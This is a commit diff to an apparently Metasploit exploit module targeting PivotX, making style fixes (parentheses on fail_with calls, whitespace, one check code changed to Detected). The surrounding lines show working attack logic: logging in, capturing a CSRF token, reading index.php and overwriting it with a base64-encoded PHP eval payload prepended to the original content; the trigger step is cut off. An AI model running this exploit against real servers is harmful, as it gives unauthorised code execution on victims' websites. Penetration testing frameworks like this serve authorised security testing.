Unifies parenthesis in fail_with calling, whitespaces fixes, changing CheckCode::Unknown to CheckCode::Detected

msutovsky-r7 · msutovsky-r7 · commit 2328b40df732 · 2025-08-01T09:34:47.000+02:00
diff --git a/modules/exploits/linux/http/pivotx_index_php_overwrite.rb b/modules/exploits/linux/http/pivotx_index_php_overwrite.rb
@@ -65,13 +65,13 @@ def check
 
     html_body = res.get_html_document
 
-    return Msf::Exploit::CheckCode::Unknown('Could not find version element') unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
+    return Msf::Exploit::CheckCode::Detected('Could not find version element') unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
 
     version = Rex::Version.new(Regexp.last_match(1))
 
-    return Msf::Exploit::CheckCode::Appears("Detected PivotX  #{version}") if version <= Rex::Version.new('3.0.0-rc3')
+    return Msf::Exploit::CheckCode::Appears("Detected PivotX #{version}") if version <= Rex::Version.new('3.0.0-rc3')
 
-    return Msf::Exploit::CheckCode::Safe("PivotX  #{version} is not vulnerable")
+    return Msf::Exploit::CheckCode::Safe("PivotX #{version} is not vulnerable")
   end
 
   def login
@@ -90,7 +90,7 @@ def login
       'keep_cookies' => true
     })
 
-    fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless (res&.code == 200 || res&.code == 302) && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
+    fail_with(Failure::NoAccess, 'Login failed, probably incorrect credentials') unless (res&.code == 200 || res&.code == 302) && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
 
     @csrf_token = Regexp.last_match(1)
   end
@@ -102,7 +102,7 @@ def modify_file
       'vars_get' => { 'page' => 'homeexplore' }
     })
 
-    fail_with Failure::UnexpectedReply, 'Received unexpected response when fetching working directory' unless res&.code == 200 && res.body =~ /basedir=([a-zA-Z0-9]+)/
+    fail_with(Failure::UnexpectedReply, 'Received unexpected response when fetching working directory') unless res&.code == 200 && res.body =~ /basedir=([a-zA-Z0-9]+)/
 
     @base_dir = Regexp.last_match(1)
 
@@ -112,19 +112,19 @@ def modify_file
       'vars_get' => { 'function' => 'view', 'basedir' => @base_dir, 'file' => 'index.php' }
     })
 
-    fail_with Failure::UnexpectedReply, 'Received unexpected response when fetching index.php' unless res&.code == 200
+    fail_with(Failure::UnexpectedReply, 'Received unexpected response when fetching index.php') unless res&.code == 200
 
     @original_value = res.get_html_document.at('textarea')&.text
 
-    fail_with Failure::Unknown, 'Could not find content of index.php' unless @original_value
+    fail_with(Failure::Unknown, 'Could not find content of index.php') unless @original_value
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'pivotx', 'ajaxhelper.php'),
       'vars_post' => { 'csrfcheck' => @csrf_token, 'function' => 'save', 'basedir' => @base_dir, 'file' => 'index.php', 'contents' => "<?php eval(base64_decode('#{Base64.strict_encode64(payload.encoded)}')); ?> #{@original_value}" }
     })
 
-    fail_with Failure::PayloadFailed, 'Failed to insert malicious PHP payload' unless res&.code == 200 && res.body.include?('Wrote contents to file index.php')
+    fail_with(Failure::PayloadFailed, 'Failed to insert malicious PHP payload') unless res&.code == 200 && res.body.include?('Wrote contents to file index.php')
   end
 
   def trigger_payload
